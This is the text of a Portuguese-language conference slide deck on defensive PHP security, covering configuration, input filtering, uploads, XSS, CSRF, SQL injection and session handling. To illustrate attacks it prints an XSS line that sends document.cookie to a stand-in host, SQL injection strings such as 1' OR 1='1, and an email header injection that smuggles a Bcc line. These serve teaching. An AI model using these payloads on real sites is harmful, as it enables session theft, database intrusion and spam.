Slide 1
Slide 1 text
PHP no Campo
de Batalha
Segurança Avançada
e Programação
Defensiva
Rafael Jaques
@rafajaques
Slide 2
Slide 2 text
“Porque Deus amou o mundo de tal maneira que deu o seu
Filho Unigênito, para que todo aquele que nele crê não pereça,
mas tenha a vida eterna. Portanto, Deus enviou o seu Filho ao
mundo não para condenar o mundo, mas para que o mundo
fosse salvo por meio dele.” (João 3.16-17)
Slide 3
Slide 3 text
Rafael Jaques
Professor do Instituto Federal de
Educação, Ciência e Tecnologia do
Rio Grande do Sul.
Graduado em Análise e
Desenvolvimento de Sistemas.
Pós-graduado em Gestão e
Docência do Ensino Superior.
Desenvolvedor web e viciado em
segurança.
Slide 4
Slide 4 text
www.php-rs.org
Slide 5
Slide 5 text
Slides da Palestra
Slide 6
Slide 6 text
1
Segurança da
informação
Slide 7
Slide 7 text
Pontos-chave da SI
Integridade
Confidencialidade
Disponibilidade
Slide 8
Slide 8 text
COMO VOU DESENVOLVER
UMA APLICAÇÃO COM
TUDO ISSO?!?!?!?!?!?!
Slide 9
Slide 9 text
Vamos por partes!
Slide 10
Slide 10 text
Tudo começa com
planejamento!
Slide 11
Slide 11 text
2
Planejamento
Slide 12
Slide 12 text
Planejamento
Projete o seu sistema
Estude antes de implementar
Revise o que foi feito
Conheça o seu ambiente
Slide 13
Slide 13 text
Planejamento
Projete o seu sistema
Estude antes de implementar
Revise o que foi feito
Conheça o seu ambiente
Slide 14
Slide 14 text
Conheça o seu ambiente
Slide 15
Slide 15 text
php.ini
Conheça o seu ambiente
phpinfo()
php.net/manual/ini.php
Slide 16
Slide 16 text
Conheça o seu ambiente
Slide 17
Slide 17 text
Altere as configurações
do php.ini
ini_set() httpd.conf
.htaccess php.ini
Conheça o seu ambiente
Slide 18
Slide 18 text
Gerenciamento de
erros do PHP
display_errors
log_errors error_log
Conheça o seu ambiente
Slide 19
Slide 19 text
Conhecer o sistema
inclui saber os
problemas do servidor!
Slide 20
Slide 20 text
Problemas no servidor
Defesa em
profundidade
Slide 21
Slide 21 text
Problemas no servidor
Lei do menor
privilégio
Slide 22
Slide 22 text
3
Melhorando o código
desenvolvido
Slide 23
Slide 23 text
Como desenvolver um
bom código?
Slide 24
Slide 24 text
Tudo começa com
BOAS PRÁTICAS
Slide 25
Slide 25 text
Warning: Cannot modify header information -
headers already sent by (output started at /
path/to/script.php:1) in script.php on line 55
Omita as tags
de fechamento
Boas práticas
Slide 26
Slide 26 text
Utilize extensões
consistentes
Boas práticas
.php
.inc.php
.inc
.php~
.bak
httpd.conf
AddType application/x-httpd-php .php .phtml
Slide 27
Slide 27 text
DRY
Don’t repeat yourself
Boas práticas
Slide 28
Slide 28 text
== != ===
Cuidado ao efetuar comparações
Boas práticas
“1” == 1
“1” === 1
true == 1
True
False
true === 1
NULL == false
NULL === false
True
True
False
False
Slide 29
Slide 29 text
Nunca edite arquivos
em produção
Boas práticas
Slide 30
Slide 30 text
Funções perigosas
exec( )
Não execute bobagem no seu sistema
shell_exec( )
system( ) passthru( )
proc_*( )
escapeshellcmd( )
escapeshellarg( )
Slide 31
Slide 31 text
eval( )
Não execute bobagem no seu código
Funções perigosas
Slide 32
Slide 32 text
Seu ambiente
também precisa
de cuidado e
atenção
Slide 33
Slide 33 text
Configuração do ambiente
Headers
Podem denunciar o seu servidor
expose_php php.ini
Slide 34
Slide 34 text
Apache
ServerTokens
Prod Major Minor Min Os Full
Configuração do ambiente
Slide 35
Slide 35 text
Gerenciar os
erros pode
salvar seu dia!
Slide 36
Slide 36 text
Gerenciamento de erros
display_errors
error_reporting
log_errors
error_log
Mostrar erros na tela
Nível de erro mostrado
Logar erros
Arquivo de log
Slide 37
Slide 37 text
set_error_handler( )
error_log( )
Indica uma função para manipular erros
Loga um erro personalizado
Gerenciamento de erros
Slide 38
Slide 38 text
4
Filtragem de
dados
Slide 39
Slide 39 text
Filtragem de dados
Bypass
Mistake Origin
Slide 40
Slide 40 text
isset( )
is_array( )
is_bool( )
is_float( )
is_int( )
is_null( )
is_numeric( )
is_object( )
is_string( )
Filtragem de dados
Slide 41
Slide 41 text
Type Casting
Assegure-se dos tipos de dados
$numero = (int) $variavel;
$numero = (float) $variavel;
Filtragem de dados
Slide 42
Slide 42 text
Type Casting
Assegure-se dos tipos de dados
$numero = settype($variavel, ‘integer’);
$bool = settype($variavel, ‘boolean’);
$texto = settype($variavel, ‘string’);
Filtragem de dados
Slide 43
Slide 43 text
Type Casting
Assegure-se dos tipos de dados
$numero = intval($variavel);
$numero = floatval($variavel);
$texto = strval($variavel);
Filtragem de dados
Slide 44
Slide 44 text
Validate
Sanitize
filter_var( )
Validating && Sanitizing
Bloqueie valores indesejados
Filtragem de dados
Slide 45
Slide 45 text
filter_var( )
php.net/filter.filters
FILTER_VALIDATE_* FILTER_SANITIZE_*
Validação de dados
Verifica se
determinado valor
encontra-se dentro dos
parâmetros esperados.
Limpeza de dados
Retira de um
determinado valor todos
os caracteres que
não são permitidos.
Slide 46
Slide 46 text
Validação
filter_var( , )
$valor CONSTANTE_FILTRO
Valor filtrado
bool(false)
Slide 47
Slide 47 text
Validação
FILTER_VALIDATE_INT
“7”
7
0
true
false
int(7)
int(7)
int(0)
int(1)
bool(false)
“10 teste”
“palavra”
-5
3.1
bool(false)
bool(false)
int(-5)
bool(false)
bool(false)
+0 || -0
Slide 48
Slide 48 text
Validação
FILTER_VALIDATE_EMAIL
“rafa@php.net" string(12) “rafa@php.net” “1@2.3" bool(false)
5 bool(false) “1@2” bool(false)
“phpit.com.br” bool(false) “joao quem”@site.com bool(false)
Slide 49
Slide 49 text
Validação
FILTER_VALIDATE_FLOAT
php.net/filter.filters.validate
FILTER_VALIDATE_BOOLEAN
FILTER_VALIDATE_IP
FILTER_VALIDATE_URL
Slide 50
Slide 50 text
Limpeza
FILTER_SANITIZE_URL
http://phpit.com.br
http://phpit.com.br£
phpitº.com.br
br¶
§
string(19) "http://phpit.com.br"
string(19) "http://phpit.com.br"
string(12) "phpit.com.br"
string(2) "br"
string(0) ""
Slide 51
Slide 51 text
FILTER_SANITIZE_STRING
uma string string(10) "uma string"
string(12) "uma string *"
string(21) "uma string<tag>"
Limpeza
uma string *
uma string<tag>
Slide 52
Slide 52 text
Limpeza
FILTER_SANITIZE_EMAIL
php.net/filter.filters.validate
FILTER_SANITIZE_SPECIAL_CHARS
FILTER_SANITIZE_ENCODED
FILTER_SANITIZE_NUMBER_INT
Slide 53
Slide 53 text
Cuidados com
Formulários
Slide 54
Slide 54 text
Spoofed Form Submissions
Cuidados com formulários
Slide 55
Slide 55 text
Spoofed HTTP Requests
Cuidados com formulários
Slide 56
Slide 56 text
Abuso de form mail
Cuidados com formulários
Slide 57
Slide 57 text
Abuso de form mail
";
$para = "email@seguro.com";
$assunto = "Contato via site";
$corpo = $_POST['mensagem'];
mail($para, $assunto, $corpo, $cabecalhos);
Slide 58
Slide 58 text
Abuso de form mail
From: Fulaninho
To: email@seguro.com
Subject: Contato via site
Esta é a mensagem do e-mail
Esperado
Fulaninho\nBcc: um@email.com, spam@enviar.com,
Slide 59
Slide 59 text
Abuso de form mail
From: Fulaninho
Bcc: um@email.com, spam@enviar.com,
To: email@seguro.com
Subject: Contato via site
Aqui coloco uma mensagem de SPAM sobre viagra ou algo assim!
Possível
Slide 60
Slide 60 text
5
Upload de
arquivos
Slide 61
Slide 61 text
MIME Type do $_FILES
Upload de arquivos
Slide 62
Slide 62 text
Algoritmo de
Análise de Conteúdo
Slide 63
Slide 63 text
Verificar o tipo da imagem
exif_imagetype( )
Upload de arquivos
Slide 64
Slide 64 text
php.net/function.exif-imagetype
Upload de arquivos
Slide 65
Slide 65 text
Ressalvar imagens
Upload de arquivos
Slide 66
Slide 66 text
Diretivas de upload
upload_max_filesize
post_max_size
Upload de arquivos
Slide 67
Slide 67 text
rafajaques
Palestra
de
PHP
exemplo.txt
Upload de arquivos
Slide 68
Slide 68 text
Array
(
[arquivo]
=>
Array
(
[name]
=>
exemplo.txt
[type]
=>
text/plain
[tmp_name]
=>
/tmp/php3IdMTx
[error]
=>
0
[size]
=>
33
)
)
Upload de arquivos
Slide 69
Slide 69 text
POST
/upload.php
HTTP/1.1
Host:
localhost
Content-‐Type:
multipart/form-‐data;
boundary=-‐-‐-‐-‐12345
Content-‐Length:
413
-‐-‐-‐-‐12345
Content-‐Disposition:
form-‐data;
name="arquivo";
filename="exemplo.txt"
Content-‐Type:
text/plain
rafajaques
Palestra
de
PHP
-‐-‐-‐-‐12345-‐-‐
Upload de arquivos
Slide 70
Slide 70 text
Movendo arquivos enviados
is_uploaded_file( )
move_uploaded_file( )
Upload de arquivos
Slide 71
Slide 71 text
6
Injeção
de código
Slide 72
Slide 72 text
XSS
Cross-Site Scripting
Slide 73
Slide 73 text
XSS
Cross-Site Scripting
document.location = "http://sitedomal.com?c=" + document.cookie
Slide 74
Slide 74 text
XSS
Cross-Site Scripting
Filtrar dados externos
Utilize as funções de filtro
Utilize uma white-list
Slide 75
Slide 75 text
htmlentities( ) strip_tags( )
XSS
Cross-Site Scripting
Utilize as funções de filtro
utf8_decode( ) filter_var( )
Slide 76
Slide 76 text
XSS
Cross-Site Scripting
Cuidado com injeção de CSS
expression( ) url( ) Métodos
específicos moz-
binding
Slide 77
Slide 77 text
CSRF
Cross-Site Request Forgery
Slide 78
Slide 78 text
CSRF
Cross-Site Request Forgery
http://meusite.com/voto.php?id=1
Slide 79
Slide 79 text
CSRF
Cross-Site Request Forgery
Exigir um token
Solicitar reautenticação
Prefira POST em vez de GET
Limite o tempo de sessão
Verificar Referer Force o uso de seus formulários
uniqid( )
$_SERVER['HTTP_REFERER']
Slide 80
Slide 80 text
Outros tipos de injeção
XPath LDAP
Bibliotecas de terceiros
Upload de arquivos
Slide 81
Slide 81 text
Indo além da
Validação de dados
Slide 82
Slide 82 text
Além da validação
Regras de negócio
Filtrou a entrada? Filtre a saída!
Não confie nos cookies!
Slide 83
Slide 83 text
7
Segurança em
bancos de dados
Slide 84
Slide 84 text
SGBDs suportados pelo PHP
php.net/refs.database
dBase
DB++
CUBRID
FrontBase
FireBird/Interbase
filePro
Ingres
Informix
IBM DB2
mSQL
Mongo
MaxDB
Oracle
MySQL
M$ SQL
PostgreSQL
Paradox
Ovrimos SQL
Tokyo Tyrant
Sybase
SQLite
Slide 85
Slide 85 text
Conceitos básicos de
segurança em
Bancos de Dados
Slide 86
Slide 86 text
Lei do
Menor Privilégio
Slide 87
Slide 87 text
Não permita
Acesso Remoto
Slide 88
Slide 88 text
Prefira utilizar
UTF-8
Slide 89
Slide 89 text
Escapar caracteres
não é seguro
mysql_real_escape_string( )
addslashes( )
Slide 90
Slide 90 text
SQL e Blind SQL
Injection
Slide 91
Slide 91 text
SQL
Injection
Slide 92
Slide 92 text
SQL Injection
Injeção de código SQL arbitrário dentro
de uma consulta legítima.
Slide 93
Slide 93 text
SQL Injection
Slide 94
Slide 94 text
SQL Injection
1' OR 1='1
Slide 95
Slide 95 text
SQL Injection
fulano'# ou fulano' --
Slide 96
Slide 96 text
SQL
Injection
Blind
Slide 97
Slide 97 text
Injeção de código arbitrário sem
visualização da saída do banco.
Blind SQL Injection
Slide 98
Slide 98 text
sqlmap
Slide 99
Slide 99 text
No content
Slide 100
Slide 100 text
Prepared Statements
e ORMs
Slide 101
Slide 101 text
Prepared Statements
Declarações preparadas
Compila as consultas SQL
Utiliza placeholders
Slide 102
Slide 102 text
Declarações preparadas
INSERT INTO produtos (nome, preco) VALUES (?, ?)
Prepared Statements
Slide 103
Slide 103 text
ORM
Object-relational mapping
Reduz a escrita de SQL
Acesso ao banco através de classes
Slide 104
Slide 104 text
ORMs
Slide 105
Slide 105 text
Exposição de
credenciais
Slide 106
Slide 106 text
O que acontece
se alguém tiver
acesso aos
seus arquivos?
Slide 107
Slide 107 text
E se o PHP
parar de
funcionar?
Slide 108
Slide 108 text
E se houver um
include mal
programado?
Slide 109
Slide 109 text
8
Cookies e
sessions
Slide 110
Slide 110 text
Cookies são client-side
Sessions são server-side
Cookies e Sessions
Slide 111
Slide 111 text
Cliente Servidor
Requisição HTTP
Resposta HTTP + Set Cookie
Requisição HTTP
Resposta HTTP
Cookies e Sessions
Slide 112
Slide 112 text
Servidor
session_start()
Verifica se a sessão
existe
Procura pelo SESSID
em um cookie
Procura pelo SESSID
numa querystring
Busca os dados e
cria a $_SESSION
Sim
Sim
Não
Cria uma nova
SESSID
Não
Cookies e Sessions
Slide 113
Slide 113 text
Roubo de Cookie
(Cookie Theft)
Slide 114
Slide 114 text
Não costumam existir
vulnerabilidades de
navegador para roubo
de cookies
Slide 115
Slide 115 text
Tome cuidado com
XSS
Slide 116
Slide 116 text
No content
Slide 117
Slide 117 text
No content
Slide 118
Slide 118 text
Cookies também
podem ser roubados
com sniffers
Proteja utilizando HTTPS
Slide 119
Slide 119 text
Vulnerabilidades
de Sessão
Slide 120
Slide 120 text
Exposição de Sessão
Dados de sessão podem ser
visualizados via sniff quando
não criptografado com HTTPS
Slide 121
Slide 121 text
Hospedagens compartilhadas podem
vazar dados dentro dos diretórios com
permissões de leitura a todos
Utilize session_set_save_handler() para alterar o
comportamento de gravação dos dados de sessão
Exposição de Sessão
Slide 122
Slide 122 text
Não é o roubo de um
ID de sessão.
É a imposição de um!
Fixação de Sessão
Slide 123
Slide 123 text
Não permita que sejam utilizados
SID não gerados pela aplicação
Fixação de Sessão
Slide 124
Slide 124 text
Gere um novo SID em
cada requisição
Utilize session_regenerate_id()
Páginas com muito tráfego acabam gerando SID inválidos
Fixação de Sessão
Slide 125
Slide 125 text
Roubo de Sessão
(Session Hijacking)
Slide 126
Slide 126 text
Roubo de Sessão
É possível fixar um SID,
forjar ou até mesmo
capturar um cookie!
Slide 127
Slide 127 text
Algumas sugestões para evitar roubo de sessão (tente
equilibrar usabilidade e segurança):
Gerar tokens únicos por usuário
Verificar User-Agent e IP
Utilizar sessões apenas via cookies
Roubo de Sessão
Slide 128
Slide 128 text
Não sacrifique a
usabilidade do projeto!
Slide 129
Slide 129 text
No content
Slide 130
Slide 130 text
não
Slide 131
Slide 131 text
Boas
práticas
Slide 132
Slide 132 text
Nunca utilize
cookies
para autenticação
Prefira cookies para informações não-vitais
Slide 133
Slide 133 text
Utilize sessões sempre em
conjunto com cookies
Ajuda a prevenir o roubo de sessão
Slide 134
Slide 134 text
pagina.php?PHPSESSID=1234
Slide 135
Slide 135 text
php.ini
session.use_cookies
session.use_only_cookies
GET / HTTP/1.1
Host: algumsite.com
User-Agent: Mozilla/5.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Cookie: PHPSESSID=3108c6a684a89787947087d4e46f278d
Cache-Control: max-age=0
Slide 136
Slide 136 text
Cuidado com hospedagem
compartilhada ou dois sites
no mesmo servidor
Pode ocorrer choque de sessão
Slide 137
Slide 137 text
No content
Slide 138
Slide 138 text
Utilize session_destroy() e
não apenas remova o
cookie
Um cookie roubado pode reinicializar uma sessão
Slide 139
Slide 139 text
Destrua a sessão antes de
alterar o nível de
permissão de usuário
autenticado
Impede que uma sessão de guest seja utilizada para
um usuário autenticado
Slide 140
Slide 140 text
9
Tráfego na
web
Slide 141
Slide 141 text
Fluxo do tráfego
Cliente Servidor
Requisição HTTP
Resposta HTTP
Requisição HTTP
Resposta HTTP
Slide 142
Slide 142 text
Sniffers em
redes abertas
Slide 143
Slide 143 text
Wireshark
Slide 144
Slide 144 text
No content
Slide 145
Slide 145 text
Configurando um
certificado SSL
Slide 146
Slide 146 text
http://www.phpit.com.br/artigos/configurando-ssl-
servidor-de-desenvolvimento-apache.phpit
Gerando um
certificado
para testes
Slide 147
Slide 147 text
Alternando entre
HTTP e HTTPS
Slide 148
Slide 148 text
Leves diferenças na
$_SERVER sob HTTPS
Slide 149
Slide 149 text
$_SERVER
[HTTP_HOST] => localhost
[SERVER_SOFTWARE] => Apache/2.2.22
[SERVER_NAME] => localhost
[SERVER_ADDR] => 127.0.0.1
[SERVER_PORT] => 80
[REMOTE_ADDR] => 127.0.0.1
[DOCUMENT_ROOT] => /var/www
HTTP
[HTTPS] => on
[SSL_TLS_SNI] => localhost
[HTTP_HOST] => localhost
[SERVER_SOFTWARE] => Apache/2.2.22
[SERVER_NAME] => localhost
[SERVER_ADDR] => 127.0.0.1
[SERVER_PORT] => 443
[REMOTE_ADDR] => 127.0.0.1
[DOCUMENT_ROOT] => /var/www
HTTPS
Slide 150
Slide 150 text
Force a utilização do
protocolo HTTPS
Via aplicação ou via apache
Slide 151
Slide 151 text
Monitorar logs
Manter PHP atualizado
Frameworks
Segurança física
Últimas dicas
Slide 152
Slide 152 text
Sempre que possível, utilize
código refatorado
Exposição phpinfo()
Cuidados ao enviar e-mails
Segurança no sistema de arquivos
Últimas dicas
Slide 153
Slide 153 text
Obrigado!
Rafael Jaques
rafa@php.net
phpit.com.br
@rafajaques
slideshare.net/rafajaques
youtube.com/realphpit
w
@
Slide 154
Slide 154 text
Imagens utilizadas
• https://flic.kr/p/5Ndwd8
• https://flic.kr/p/i3NEP6